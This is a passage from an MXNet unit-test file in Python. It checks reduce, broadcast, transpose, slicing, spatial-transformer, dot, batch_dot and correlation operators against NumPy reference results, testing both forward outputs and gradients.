if np.random.rand() > 0.5:
dat_npy = -dat_npy
if nan_prob > 0:
dat_npy[np.random.rand(*shape) < nan_prob] = np.nan
sum_groundtruth = np.array(numpy_reduce_func(dat_npy, axis=axes, keepdims=keepdims))
if sum_groundtruth.shape == ():
sum_groundtruth = np.array([sum_groundtruth])
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.array(np.random.rand(*sum_groundtruth.shape))
keepdim_shape = np_reduce(dat_npy, axes, 1, np.sum).shape
grad_groundtruth = numpy_reduce_grad_func(outgrad=outgrad_npy, data=dat_npy,
outdata=sum_groundtruth,
axis=axes, keepdims=keepdims,
keepdim_shape=keepdim_shape)
net = b._bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
# check forward
assert_almost_equal_ignore_nan(net.outputs[0].asnumpy(), sum_groundtruth, rtol=1e-4, atol=1e-4)
net.backward(out_grads=mx.nd.array(outgrad_npy))
bc_grad_groundtruth = np.broadcast_to(grad_groundtruth, grad_nd.shape)
# check backward
assert_almost_equal_ignore_nan(grad_nd.asnumpy(), bc_grad_groundtruth, rtol=1e-4, atol=1e-4)
test_none_axis = [True, False]
for test_none in test_none_axis:
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.sum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape),
mx.symbol.sum, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.mean),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape)/(data.size/outdata.size),
mx.symbol.mean, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.prod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (outdata.reshape(keepdim_shape) / data),
mx.symbol.prod, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nansum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape)),
mx.symbol.nansum, 0.3, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nanprod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape) *
(outdata.reshape(keepdim_shape) / data)),
mx.symbol.nanprod, 0.3, test_none_axis=test_none)
# grad of max and min are sensitive to the precision of the calculation.
# Force numpy to match mxnet's float32.
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.max),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.max)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.min),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.min)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.linalg.norm),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (data / outdata.reshape(keepdim_shape)),
mx.symbol.norm, test_exclude=False, test_none_axis=test_none)
def test_broadcast():
sample_num = 200
for i in range(sample_num):
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
ndim = np.random.randint(1, 6)
target_shape = np.random.randint(1, 6, size=(ndim,))
axis = tuple(set(np.random.randint(0, ndim, np.random.randint(1, ndim + 1))))
shape = target_shape.copy()
size = tuple([shape[ele] for ele in axis])
for ele in axis:
shape[ele] = 1
target_shape_with_zero = list(target_shape)
for idx in range(len(target_shape_with_zero)):
if idx not in axis:
target_shape_with_zero[idx] = 0
break
a = mx.symbol.Variable('a')
sym_bcast_axis = mx.symbol.broadcast_axis(a, axis=axis, size=size)
sym_bcast_to = mx.symbol.broadcast_to(a, shape=tuple(target_shape))
sym_bcast_to_with_zero = mx.symbol.broadcast_to(a, shape=tuple(target_shape_with_zero))
sym_bcast_like = mx.symbol.broadcast_like(a, sym_bcast_to)
def test_broadcasting_ele(sym_bcast):
dat_npy = np.random.rand(*shape)
groundtruth = dat_npy
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.random.rand(*target_shape)
grad_groundtruth = np_reduce(outgrad_npy, axis=axis, keepdims=True,
numpy_reduce_func=np.sum)
net = sym_bcast._bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
assert (net.outputs[0].shape == target_shape).all()
assert_almost_equal(net.outputs[0], groundtruth, rtol=1e-4)
net.backward(out_grads=mx.nd.array(outgrad_npy))
assert_almost_equal(grad_nd, grad_groundtruth, rtol=1e-4)
test_broadcasting_ele(sym_bcast_axis)
test_broadcasting_ele(sym_bcast_to)
test_broadcasting_ele(sym_bcast_to_with_zero)
test_broadcasting_ele(sym_bcast_like)
def test_transpose():
for ndim in range(1, 10):
for t in range(5):
dims = list(np.random.randint(1, 5, size=ndim))
axes = list(range(ndim))
random.shuffle(axes)
axes = tuple(axes)
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
@pytest.mark.serial
def test_pseudo2dtranspose():
def getTwoInts(mn, mx):
n1 = np.random.randint(mn, mx)
n2 = np.random.randint(mn, mx-1)
n2 = n2 if n2 < n1 else n2+1
return tuple(np.sort([n1, n2]))
def getTranspAxes(ndim):
axes = list(range(ndim))
n1, n2 = getTwoInts(0,ndim)
return tuple(axes[:n1]+axes[n2:]+axes[n1:n2])
for ndim in range(2, 7):
for dt in ['int8', 'half', 'int32', 'int64']:
for _ in range(5):
dims = list(np.random.randint(5, 20, size=ndim))
axes = getTranspAxes(ndim)
x = mx.nd.array(np.random.normal(size=dims), dtype=dt)
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
@pytest.mark.serial
def test_big_transpose():
n = [1]
d = list(np.random.randint(132, 160, size=1))
hw = list(np.random.randint(256, 320, size=2))
c = [10]
dims = n + d + hw + c
axes = (0,4,1,2,3)
x_np = np.random.normal(size=dims).astype('uint8')
x = mx.nd.array(x_np, dtype='uint8')
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x_np, axes=axes), y.asnumpy().astype('uint8'))
axes = (0,2,3,4,1)
z = mx.nd.transpose(y, axes=axes)
assert_allclose(x_np, z.asnumpy().astype('uint8'))
@pytest.mark.serial
def test_larger_transpose():
x = mx.nd.random.normal(shape=(50,51))
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
def test_expand_dims():
for ndim in range(1, 6):
for axis in range(-ndim + 1, ndim):
x = np.random.normal(size=list(np.random.randint(1, 10, size=ndim)))
y = mx.nd.array(x)
x1 = np.expand_dims(x, axis=axis)
y1 = mx.nd.expand_dims(y, axis=axis)
assert_allclose(x1, y1.asnumpy())
assert_allclose(x1.shape, y1.shape)
def test_crop():
for ndim in range(1, 6):
for t in range(5):
dims = []
begin = []
end = []
idx = []
for i in range(ndim):
d = random.randint(1, 5)
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if b == 0 and random.randint(0, 1):
b = None
elif b != 0 and random.randint(0, 1):
b -= d
if e == d and random.randint(0, 1):
e = None
elif e != d and random.randint(0, 1):
e -= d
dims.append(d)
begin.append(b)
end.append(e)
idx.append(slice(b, e))
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.crop(x, begin=tuple(begin), end=tuple(end))
assert_allclose(x.asnumpy()[idx], y.asnumpy())
vx = mx.sym.Variable('x')
vy = mx.sym.crop(vx, begin=tuple(begin), end=tuple(end))
check_numeric_gradient(vy, [x.asnumpy()])
def test_slice_axis():
for ndim in range(1, 6):
shape = np.random.randint(1, 11, size=(ndim,))
for t in range(ndim):
d = shape[t]
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if np.random.rand() > 0.6:
e = None
else:
if e < d and np.random.rand() > 0.5:
e = e - d
if np.random.rand() > 0.5:
b = b - d
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
idx[t] = slice(b, e)
X = mx.symbol.Variable('X')
x = mx.nd.array(np.random.normal(size=shape))
Y = mx.symbol.slice_axis(data=X, axis=t, begin=b, end=e)
xgrad = mx.nd.empty(x.shape)
exec1 = Y._bind(default_context(), args = [x], args_grad = {'X': xgrad})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
x_grad_npy = np.random.normal(size=x.shape)
xgrad = mx.nd.array(x_grad_npy)
exec2 = Y._bind(default_context(), args=[x], args_grad={'X': xgrad}, grad_req="add")
exec2.forward(is_train=True)
exec2.backward([exec2.outputs[0]])
xx = np.zeros(shape=x.shape, dtype=np.float32)
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx + x_grad_npy, xgrad.asnumpy(), atol=1E-5)
def test_slice_like():
for ndim in range(1, 6):
from_shape = np.random.randint(1, 11, size=(ndim,))
shape = [s + np.random.randint(0, 3) for s in from_shape]
for t in range(ndim):
if t > 0:
axes = np.random.randint(0, ndim, size=t).tolist()
else:
axes = []
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
if i in axes or not axes:
idx[i] = slice(0, from_shape[i])
if axes:
pos = np.random.randint(0, t)
if axes[pos] > 0:
axes[pos] -= ndim # negative index
X = mx.symbol.Variable('X')
X_1 = mx.symbol.Variable('X1')
x = mx.nd.array(np.random.normal(size=shape))
x1 = mx.nd.array(np.random.normal(size=from_shape))
Y = mx.symbol.slice_like(data=X, shape_like=X_1, axes=axes)
xgrad = mx.nd.empty(x.shape)
xgrad1 = mx.nd.empty(x1.shape)
exec1 = Y._bind(default_context(), args = [x, x1],
args_grad = {'X': xgrad, 'X1': xgrad1})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
assert_allclose(xgrad1.asnumpy(), mx.nd.zeros_like(xgrad1).asnumpy())
def test_slice_like_different_types():
x = [[ 1., 2., 3., 4.],
[ 5., 6., 7., 8.],
[ 9., 10., 11., 12.]]
y = [[ 0., 0., 0.],
[ 0., 0., 0.]]
x = mx.nd.array(x)
y = mx.nd.array(y).astype('int32')
z = mx.nd.slice_like(x, y)
assert_allclose(z.asnumpy(), [[1,2,3],[5,6,7]])
def test_reshape_like_different_types():
x = mx.nd.zeros((2, 3))
y = mx.nd.array([[1, 2], [3, 4], [5, 6]])
y = mx.nd.array(y).astype('int32')
z = mx.nd.reshape_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0],[0,0]])
def test_broadcast_like_different_types():
x = mx.nd.zeros((2, 1))
y = mx.nd.ones((2, 2))
y = mx.nd.array(y).astype('int32')
z = mx.nd.broadcast_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0]])
assert x.dtype == z.dtype
def test_flip():
for ndim in range(1, 6):
for t in range(5):
dims = [random.randint(1,10) for i in range(ndim)]
axis = random.randint(0, ndim-1)
idx = [slice(None, None, -1) if i == axis else slice(None, None) for i in range(ndim)]
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.flip(x, axis=axis)
assert_allclose(x.asnumpy()[idx], y.asnumpy())
def test_stn():
import sys
np.set_printoptions(threshold=sys.maxsize)
num_filter = 2 # conv of loc net
kernel = (3, 3) # conv of loc net
num_hidden = 6 # fc of loc net
for n in [1, 2, 3, 4]:
for c in [1, 2, 3, 4]:
for h in [5, 9, 13, 17]: # for convenience test, this third and forth input dim should be 4x + 1
for w in [5, 9, 13, 17]:
data_shape = (n, c, h, w)
target_shape = (int((data_shape[2]+1)/2), int((data_shape[3]+1)/2))
data = mx.sym.Variable(name="data")
loc = mx.sym.Convolution(data=data, kernel=kernel, pad=(1, 1), num_filter=num_filter, name="loc_conv")
loc = mx.sym.Flatten(data=loc)
loc = mx.sym.FullyConnected(data=loc, num_hidden=num_hidden, name="loc_fc")
stn = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=target_shape,
transform_type="affine", sampler_type="bilinear")
arg_names = stn.list_arguments()
arg_shapes, out_shapes, _ = stn.infer_shape(data=data_shape)
# check shape
assert out_shapes[0] == (data_shape[0], data_shape[1], target_shape[0], target_shape[1])
dev = default_context()
#dev = mx.gpu(0)
args = {}
args['data'] = mx.random.normal(0, 1, data_shape, ctx=mx.cpu()).copyto(dev)
args['loc_conv_weight'] = mx.nd.zeros((num_filter, data_shape[1], kernel[0], kernel[1]), ctx=dev)
args['loc_conv_bias'] = mx.nd.zeros((num_filter,), ctx=dev)
args['loc_fc_weight'] = mx.nd.zeros((6, num_filter*data_shape[2]*data_shape[3]), ctx=dev)
args['loc_fc_bias'] = mx.nd.array([0.5, 0, 0, 0, 0.5, 0], ctx=dev)
grad_grad = [mx.nd.zeros(shape, ctx=dev) for shape in arg_shapes]
exe = stn._bind(dev, args=args, args_grad=grad_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
# check forward
assert_almost_equal(out, args['data'].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
out_grad = mx.nd.ones(out.shape, ctx=dev)
exe.backward([out_grad])
# check backward
assert_almost_equal(out_grad, grad_grad[0].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
def test_stn_valid_sampling():
target_shape = (
28,
28,
)
src_shape = (
42,
42,
)
data = mx.sym.Variable(name="data")
loc = mx.sym.Variable(name="loc")
data_array = np.zeros((
1,
1,
) + src_shape)
# Have an ever so slight rotation.
loc_array = np.array(
[[9.03887e-05, 1.00015, 0.00174931, 1.0003, 0.000311901,
-0.000919065]])
stn = mx.sym.SpatialTransformer(
data=data,
loc=loc,
target_shape=target_shape,
transform_type="affine",
sampler_type="bilinear")
grad_req = {k: 'write' for k in stn.list_arguments()}
grads = {
'data': mx.nd.array(np.zeros_like(data_array)),
'loc': mx.nd.array(np.zeros_like(loc_array))
}
executor = stn._bind(
ctx=default_context(),
args={'data': mx.nd.array(data_array),
'loc': mx.nd.array(loc_array)},
grad_req=grad_req,
args_grad=grads)
executor.forward(is_train=True)
executor.backward(mx.nd.ones((
1,
1,
) + target_shape))
def test_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
ndims = [2]
if ctx.device_type == 'gpu':
dtypes += ['float16']
ndims += [1]
# Test normal dot.
for ndim in ndims:
for data_type in dtypes:
tol = 1e-2 if data_type == 'float16' else 1e-3
for m in range(1, 5):
for k in range(1, 5):
if ndim == 1 and k != 1:
pass
for n in range(1, 5):
a_shape = (m, k) if ndim == 2 else (m,)
b_shape = (k, n) if ndim == 2 else (n,)
a_npy = np.random.normal(0, 1, (m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((m, k), dtype=data_type)
bgrad_npy = np.empty((k, n), dtype=data_type)
c_npy[:, :] = np.dot(a_npy[:, :], b_npy[:, :])
bgrad_npy[:, :] = np.dot(a_npy[:, :].T, ograd_npy[:, :])
agrad_npy[:, :] = np.dot(ograd_npy[:, :], b_npy[:, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.dot(a, b)
exe = c._simple_bind(ctx=ctx, a=a_npy.shape, b=b_npy.shape)
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy, rtol=tol, atol=tol)
exe.backward(out_grads=[mx.nd.array(ograd_npy, mx.cpu()).astype(data_type)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy, rtol=tol, atol=tol)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy, rtol=tol, atol=tol)
# Test dot with transpose flag using gradient checker.
def dot_sym(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y)
def dot_sym_xT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True)
def dot_sym_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_b=True)
def dot_sym_xT_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True, transpose_b=True)
for data_type in dtypes:
for ashape, bshape in [((3, 4), (4, 5)), ((2, 3, 4), (4, 5, 6))]:
m1_npy = np.random.uniform(-1, 1, ashape)
m1_npy = m1_npy.astype(data_type)
m2_npy = np.random.uniform(-1, 1, bshape)
m2_npy = m2_npy.astype(data_type)
check_numeric_gradient(dot_sym(data_type), [m1_npy, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT(data_type), [m1_npy.T, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_yT(data_type), [m1_npy, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT_yT(data_type), [m1_npy.T, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
def test_batch_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
if ctx.device_type == 'gpu':
dtypes += ['float16']
for data_type in dtypes:
for batch_size in range(1, 5):
for m in range(1, 5):
for k in range(1, 5):
for n in range(1, 5):
transpose_a = (np.random.rand() > 0.5)
transpose_b = (np.random.rand() > 0.5)
a_npy = np.random.normal(0, 1, (batch_size, m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (batch_size, k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((batch_size, m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (batch_size, m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((batch_size, m, k), dtype=data_type)
bgrad_npy = np.empty((batch_size, k, n), dtype=data_type)
a_init_grad_npy = np.random.normal(size=(batch_size, m, k))
a_init_grad_npy = a_init_grad_npy.astype(data_type)
b_init_grad_npy = np.random.normal(size=(batch_size, k, n))
b_init_grad_npy = b_init_grad_npy.astype(data_type)
for i in range(batch_size):
c_npy[i, :, :] = np.dot(a_npy[i, :, :], b_npy[i, :, :])
bgrad_npy[i, :, :] = np.dot(a_npy[i, :, :].T, ograd_npy[i, :, :])
agrad_npy[i, :, :] = np.dot(ograd_npy[i, :, :], b_npy[i, :, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.batch_dot(a, b, transpose_a=transpose_a, transpose_b=transpose_b)
if transpose_a:
a_npy = np.transpose(a_npy, axes=(0, 2, 1))
agrad_npy = np.transpose(agrad_npy, axes=(0, 2, 1))
a_init_grad_npy = np.transpose(a_init_grad_npy, axes=(0, 2, 1))
if transpose_b:
b_npy = np.transpose(b_npy, axes=(0, 2, 1))
bgrad_npy = np.transpose(bgrad_npy, axes=(0, 2, 1))
b_init_grad_npy = np.transpose(b_init_grad_npy, axes=(0, 2, 1))
exe = c._simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='write')
exe_add = c._simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='add')
exe_add.grad_dict['a'][:] = a_init_grad_npy
exe_add.grad_dict['b'][:] = b_init_grad_npy
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe.backward(out_grads=[mx.nd.array(ograd_npy, dtype=outputs[0].dtype, ctx=exe._ctx)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe_add.forward(is_train=True, a=a_npy, b=b_npy)
exe_add.backward(out_grads=[mx.nd.array(ograd_npy, dtype=exe_add.outputs[0].dtype, ctx=exe._ctx)])
assert_almost_equal(exe_add.grad_dict['a'],
agrad_npy + a_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe_add.grad_dict['b'],
bgrad_npy + b_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
def get_correlation(data1,data2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply):
img1 = mx.sym.Variable('img1')
img2 = mx.sym.Variable('img2')
return mx.sym.Correlation(data1=img1,data2=img2,kernel_size =kernel_size,max_displacement = max_displacement,
stride1 = stride1,stride2 = stride2,pad_size= pad_size,is_multiply = is_multiply)
def correlation_forward(data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp2 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp1[:, :, pad_size:pad_size + data1.shape[2], pad_size:pad_size + data1.shape[3]] = data1[:,:,:,:]
tmp2[:, :, pad_size:pad_size + data2.shape[2], pad_size:pad_size + data2.shape[3]] = data2[:,:,:,:]
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
out[nbatch, top_channel, i, j] += tmp1[nbatch, channel,y1 + h, x1 + w] * tmp2[nbatch, channel, y2 + h,x2 + w]
else:
out[nbatch, top_channel, i, j] += abs(tmp1[nbatch, channel, y1 + h, x1 + w] - tmp2[nbatch, channel, y2 + h, x2 + w])
out /= float(kernel_size**2*data1.shape[1])
return out,tmp1,tmp2
def correlation_backward(out_grad,tmp1,tmp2,data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1_grad = np.zeros(tmp1.shape)
tmp2_grad = np.zeros(tmp2.shape)
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*tmp2[nbatch, channel, y2 + h,x2 + w]
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*tmp1[nbatch, channel, y1 + h,x1 + w]
else:
sgn = 1 if (tmp1[nbatch, channel, y1 + h,x1 + w]>=tmp2[nbatch, channel, y2 + h,x2 + w]) else -1
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*sgn
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*(-sgn)
tmp1_grad = tmp1_grad / float(kernel_size**2*data1.shape[1])
tmp2_grad = tmp2_grad / float(kernel_size**2*data1.shape[1])
return tmp1_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],tmp2_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],
def unittest_correlation(data_shape,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply,dtype):
img1 = np.random.random(data_shape)
img1 = img1.astype(dtype)
img2 = np.random.random(data_shape)
img2 = img2.astype(dtype)
net1 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply)
net2 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply )
exe1 = net1._simple_bind(default_context(),img1=img1.shape,img2=img1.shape)
exe1.arg_dict['img1'][:] = img1
exe1.arg_dict['img2'][:] = img2
#cpu forward
exe1.forward(is_train=True)
# python forward
forward_result,tmp1,tmp2 = correlation_forward(img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# forward error
assert_almost_equal(exe1.outputs[0], forward_result, rtol=1e-4, atol=1e-4)
# out_grad
a = np.ones(forward_result.shape)
out_grad1 = mx.nd.array(a,default_context())
# cpu backward
exe1.backward(out_grads=out_grad1)
# python backward
grad1,grad2 = correlation_backward(a,tmp1,tmp2,img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# backward error
assert_almost_equal(exe1.grad_dict['img1'], grad1, rtol=1e-3, atol=1e-4)
assert_almost_equal(exe1.grad_dict['img2'], grad2, rtol=1e-3, atol=1e-4)
def test_correlation():
def test_infer_type(dtype):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
corr = mx.sym.Correlation(data1=a, data2=b)
arg_type1, out_type1, _ = corr.infer_type(a=dtype)
if arg_type1[0] != np.dtype(dtype) and arg_type1[1] != np.dtype(dtype) and out_type1[0] != np.dtype(dtype):
msg = npt.npt.build_err_msg([a, b],
err_msg="Inferred type from a is not as expected, "
"Expected :%s %s %s, Got: %s %s %s"
% (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
names=['a', 'b'])
raise AssertionError(msg)
arg_type2, out_type2, _ = corr.infer_type(b=dtype)
if arg_type2[0] != np.dtype(dtype) and arg_type2[1] != np.dtype(dtype) and out_type2[0] != np.dtype(dtype):
msg = npt.npt.build_err_msg([a, b],
err_msg="Inferred type from b is not as expected, "
"Expected :%s %s %s, Got: %s %s %s"
% (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
names=['a', 'b'])
raise AssertionError(msg)
for dtype in ['float16', 'float32']:
test_infer_type(dtype)
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 1,stride2 = 1,pad_size = 4,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 10,stride1 = 1,stride2 = 2,pad_size = 10,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,6,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,11,11), kernel_size = 5,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
